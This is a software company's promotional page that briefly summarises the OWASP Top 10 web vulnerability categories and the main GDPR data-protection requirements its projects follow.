Secure best practices is key for the success of any software. Having ‘No security’ is bound to create shocking outcome in the long run loosing trust. Exposing customer personal identifiable information to hackers impact loss of sale and market worth while resulting in legal suits from client’s customers. At Codegic all of our projects and products are developed having security in mind. Our prime focus in all software development revolves around two main security guidelines:

  • OWASP Top 10
  • GDPR

OWASP Top 10

Open Web Application Security Project is an industry and academia initiative to outnumber hackers which are trying to impact on Confidentiality, Availability and Integrity of your business. OWASP initiative has identified top 10 vulnerabilities which can get hackers to impact your software system. OWASP Top 10 includes:
OWASP - Top 10

Injection

This attack lets hackers inject arbitrary code which can be executed e.g. SQL Injection

Broken Authentication

This attack lets hackers gets into your portal by breaking the authentication

Sensitive Data Exposure

This attack lets sensitive data to be exposed to the hacker e.g. password, security keys etc.

XML External Entitites

This attack lets external code while parsing the incoming XML

Broken Access control

This attack lets users elevate their role and hence access part of system not intended for them

Insufficient logging and monitoring

Insufficient logging and monitoring can prevent you from detecting any attacks coming your way

Security Misconfigurations

This attacks lets hackers access any parts of the system be it OS, database, webserver if they are not configured properly

Cross Site Scripting (XSS)

This attack lets hackers execute any code e.g. javascript which could expose user's data to outside world

Insecure Deserialization

This attack let hackers edit serialized data to elevate their privileges.

Using Components with known vulnerabilities

This attack lets hackers exploit the vulnerabilities present inside components which are not patched or updated.

GDPR

The General Data Protection Regulation is a regulation in EU law on data protection and privacy for all individual citizens of the European Union and the European Economic Area. This is the is the most important change in data privacy regulation in 20 years.

Consent

This cannot be implicit and must be in clear. The consent must define the purpose of providing the personal data or explain the reason of processing. The privacy policy should be there and cannot be full or legal jargons. It must also be very easy to withdraw consent as it is to give it.

Right to be Forgotten

This includes the right of data subject to request data controller to delete, cease processing of their personal data. This also applies to processors working with data controllers.

Data Portability

This involves the right to receive the personal data concerning data subjects in a commonly use and machine readable format so that they can move it to another controller.

Increased Scope

Applies to all companies processing the personal data of data subjects residing in the European Union. This is irrespective of the company’s location hence applies to both EU held and outside companies. A data protection officer must also be appointed.

Breach Notification

This must be done within 72 hours of become aware of the breach. Data processors are also required to notify their customers, the controllers without delay.

Data Protection Officers

It is important to have DPO to ensure all internal records are properly kept. DPO is also appointed to act as a single point of contact for regulatory authorities and data subjects.

Right to Access

This includes the right of data subjects to get a confirmation from data controllers on whether they are processing their personal data or not. They must tell data subjects where is it processed and what. Data controllers must also provide a fre copy of the personal data when requested in an electronic format.

Privacy by Design

This involves companies or data controllers involve privacy concepts from the point of designing the system or solutions and not at the end. This requires companies to put effective Administrative, Technical and Physical Controls. This also requires processing personal data based on need basis.

Penalties

Breach of GDPR can be up to 4% of annual global turnover or €20 Million (whichever is greater). Some of the infringements include e.g. Not having sufficient customer consent to process data, not following Privacy by Design concepts, not having secur records. Similar fines will imposed on not notifying supervising authority and data subjects about a breach, not conducting impact assessment. These rules apply to both processors and controllers. This means cloud service providers are not exempt from GDPR enforcement.

GDPR